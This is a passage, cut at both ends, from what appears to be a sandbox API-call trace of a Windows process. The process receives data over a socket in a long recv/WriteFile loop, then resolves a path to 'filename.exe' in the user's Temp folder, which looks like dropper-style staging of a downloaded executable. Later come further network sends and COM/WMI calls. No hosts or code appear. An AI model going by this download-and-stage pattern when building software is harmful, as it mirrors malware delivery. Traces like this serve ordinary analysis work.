lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.382] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.382] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.383] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.383] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.385] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.385] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.387] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.387] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.388] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.388] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.389] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.390] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.391] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.392] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.394] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.394] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.395] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.395] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.397] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.397] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.399] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.399] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.407] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.407] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.409] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.409] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.410] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.411] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.413] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.413] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.420] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.420] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.422] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.422] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.424] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.425] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.426] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.427] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.429] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.429] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.431] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.431] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.432] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.433] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.434] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.434] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.437] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.437] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.439] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.439] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.440] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.440] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.442] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.442] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.448] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.448] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.450] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.450] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.451] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.452] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.453] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.453] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.496] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.496] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.498] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.498] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.500] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.500] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.502] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.502] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.505] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.505] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.507] recv (in: s=0x550, buf=0x2209ae8, len=36102, flags=0 | out: buf=0x2209ae8*) returned 36102 [0294.567] SetEvent (hEvent=0x2ec) returned 1 [0294.568] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x8d06, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x8d06, lpOverlapped=0x0) returned 1 [0294.569] CloseHandle (hObject=0x564) returned 1 [0295.358] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0295.359] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\filename.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe") returned 0x32 [0295.359] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ee10, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0295.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", nBufferLength=0x105, lpBuffer=0x19ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", lpFilePart=0x0) returned 0x35 [0295.362] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", nBufferLength=0x105, lpBuffer=0x19edf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", lpFilePart=0x0) returned 0x35 [0295.362] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x19ee10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x28 [0295.363] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\.", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x28 [0295.363] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0295.363] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\filename.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe") returned 0x32 [0295.364] LocalAlloc (uFlags=0x0, uBytes=0x64) returned 0x552a570 [0295.364] LocalAlloc (uFlags=0x0, uBytes=0x52) returned 0x5526960 [0311.502] LocalFree (hMem=0x552a570) returned 0x0 [0311.503] LocalFree (hMem=0x5526960) returned 0x0 [0311.648] CoCreateGuid (in: pguid=0x19efe8 | out: pguid=0x19efe8*(Data1=0xd36dbef9, Data2=0xf718, Data3=0x4195, Data4=([0]=0xa9, [1]=0x40, [2]=0x55, [3]=0x96, [4]=0xe8, [5]=0xba, [6]=0x3e, [7]=0xc8))) returned 0x0 [0311.652] CoCreateGuid (in: pguid=0x19ef18 | out: pguid=0x19ef18*(Data1=0x5f1e0680, Data2=0x4fa, Data3=0x4848, Data4=([0]=0xb3, [1]=0xdf, [2]=0x26, [3]=0x8, [4]=0xb0, [5]=0xf3, [6]=0x6c, [7]=0x61))) returned 0x0 [0311.660] send (s=0x348, buf=0x3734d17*, len=602, flags=0) returned 602 [0311.960] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 112 [0311.961] CoCreateGuid (in: pguid=0x19efe8 | out: pguid=0x19efe8*(Data1=0x1c64f6f2, Data2=0xedd, Data3=0x4ef0, Data4=([0]=0x90, [1]=0xcb, [2]=0x1a, [3]=0x79, [4]=0x59, [5]=0x87, [6]=0x38, [7]=0xbd))) returned 0x0 [0313.957] CoCreateGuid (in: pguid=0x19ef18 | out: pguid=0x19ef18*(Data1=0xda6d2a7b, Data2=0xeb65, Data3=0x455d, Data4=([0]=0x97, [1]=0x4f, [2]=0x4a, [3]=0xe0, [4]=0x98, [5]=0x5d, [6]=0x86, [7]=0xaf))) returned 0x0 [0313.960] send (s=0x348, buf=0x221c623*, len=558, flags=0) returned 558 [0313.961] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 60 [0314.083] CoGetContextToken (in: pToken=0x19fdc0 | out: pToken=0x19fdc0) returned 0x0 [0314.084] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fde4 | out: ppvObject=0x19fde4*=0x601a94) returned 0x0 [0314.084] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fe44 | out: pThreadType=0x19fe44*=0) returned 0x0 [0314.084] IUnknown:Release (This=0x601a94) returned 0x0 [0314.086] CoGetContextToken (in: pToken=0x19fadc | out: pToken=0x19fadc) returned 0x0 [0314.086] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb00 | out: ppvObject=0x19fb00*=0x601a94) returned 0x0 [0314.086] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb2c | out: pThreadType=0x19fb2c*=0) returned 0x0 [0314.086] IUnknown:Release (This=0x601a94) returned 0x0 [0314.089] CoGetContextToken (in: pToken=0x19fadc | out: pToken=0x19fadc) returned 0x0 [0314.089] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb00 | out: ppvObject=0x19fb00*=0x601a94) returned 0x0 [0314.089] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb2c | out: pThreadType=0x19fb2c*=0) returned 0x0 [0314.093] IUnknown:Release (This=0x601a94) returned 0x0 [0314.492] CoGetContextToken (in: pToken=0x19fadc | out: pToken=0x19fadc) returned 0x0 [0314.492] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb00 | out: ppvObject=0x19fb00*=0x601a94) returned 0x0 [0314.493] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb2c | out: pThreadType=0x19fb2c*=0) returned 0x0 [0314.493] IUnknown:Release (This=0x601a94) returned 0x0 [0314.794] CoGetContextToken (in: pToken=0x19fadc | out: pToken=0x19fadc) returned 0x0 [0314.794] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb00 | out: ppvObject=0x19fb00*=0x601a94) returned 0x0 [0314.795] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb2c | out: pThreadType=0x19fb2c*=0) returned 0x0 [0314.795] IUnknown:Release (This=0x601a94) returned 0x0 [0314.934] CoGetContextToken (in: pToken=0x19fadc | out: pToken=0x19fadc) returned 0x0 [0314.934] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb00 | out: ppvObject=0x19fb00*=0x601a94) returned 0x0 [0314.934] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb2c | out: pThreadType=0x19fb2c*=0) returned 0x0 [0314.934] IUnknown:Release (This=0x601a94) returned 0x0 [0314.936] CoGetContextToken (in: pToken=0x19faf4 | out: pToken=0x19faf4) returned 0x0 [0314.936] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19fb18 | out: ppvObject=0x19fb18*=0x601a94) returned 0x0 [0314.936] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x19fb44 | out: pThreadType=0x19fb44*=0) returned 0x0 [0314.936] IUnknown:Release (This=0x601a94) returned 0x0 [0314.937] CoUninitialize () Thread: id = 7 os_tid = 0xac0 Thread: id = 8 os_tid = 0x758 Thread: id = 9 os_tid = 0x4ac [0213.617] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0213.617] RoInitialize () returned 0x1 [0213.617] RoUninitialize () returned 0x0 [0262.229] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0262.229] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0262.229] WbemLocator:IUnknown:Release (This=0x65c948) returned 0x1 [0262.229] WbemLocator:IUnknown:Release (This=0x65c948) returned 0x0 [0262.229] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0262.229] IUnknown:Release (This=0x54bcc90) returned 0x2 [0262.229] IUnknown:Release (This=0x54bcc90) returned 0x1 [0262.230] IUnknown:Release (This=0x54bcc90) returned 0x0 [0262.230] CloseHandle (hObject=0x2fc) returned 1 [0262.230] RegCloseKey (hKey=0x3b8) returned 0x0 [0262.230] CloseHandle (hObject=0x2f8) returned 1 [0262.231] CloseHandle (hObject=0x2f4) returned 1 [0262.231] CloseHandle (hObject=0x34c) returned 1 [0262.231] CloseHandle (hObject=0x310) returned 1 [0262.231] CloseHandle (hObject=0x2f0) returned 1 [0262.231] CloseHandle (hObject=0x2ec) returned 1 [0262.232] CloseHandle (hObject=0x30c) returned 1 [0262.232] CloseHandle (hObject=0x2e8) returned 1 [0262.232] CloseHandle (hObject=0x344) returned 1 [0262.232] CloseHandle (hObject=0x308) returned 1 [0262.232] RegCloseKey (hKey=0x3bc) returned 0x0 [0262.232] CloseHandle (hObject=0x2e0) returned 1 [0262.233] CloseHandle (hObject=0x304) returned 1 [0262.233] CloseHandle (hObject=0x340) returned 1 [0262.233] CloseHandle (hObject=0x300) returned 1 [0262.233] CloseHandle (hObject=0x350) returned 1 [0267.090] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0267.090] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.090] IUnknown:Release (This=0x5d6ed0) returned 0x2 [0267.090] IUnknown:Release (This=0x5d6ed0) returned 0x1 [0267.090] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.090] WbemLocator:IUnknown:Release (This=0x670170) returned 0x1 [0267.090] WbemLocator:IUnknown:Release (This=0x67e780) returned 0x0 [0267.093] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.093] WbemLocator:IUnknown:Release (This=0x54ba358) returned 0x1 [0267.093] WbemLocator:IUnknown:Release (This=0x54ba358) returned 0x0 [0267.093] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.093] IUnknown:Release (This=0x5fcf90) returned 0x2 [0267.094] IUnknown:Release (This=0x5fcf90) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x54bcc90) returned 0x2 [0267.094] IUnknown:Release (This=0x54bcc90) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x6804a0) returned 0x2 [0267.094] IUnknown:Release (This=0x6804a0) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x67fec8) returned 0x2 [0267.094] IUnknown:Release (This=0x67fec8) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x550bc18) returned 0x2 [0267.094] IUnknown:Release (This=0x550bc18) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x550b5a0) returned 0x2 [0267.094] IUnknown:Release (This=0x550b5a0) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x550b280) returned 0x2 [0267.094] IUnknown:Release (This=0x550b280) returned 0x1 [0267.094] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.094] IUnknown:Release (This=0x6a07a0) returned 0x2 [0267.094] IUnknown:Release (This=0x6a07a0) returned 0x1 [0267.095] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.095] IUnknown:Release (This=0x55156a0) returned 0x2 [0267.095] IUnknown:Release (This=0x55156a0) returned 0x1 [0267.095] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.095] IUnknown:Release (This=0x6a0258) returned 0x2 [0267.095] IUnknown:Release (This=0x6a0258) returned 0x1 [0267.095] CoGetContextToken (in: 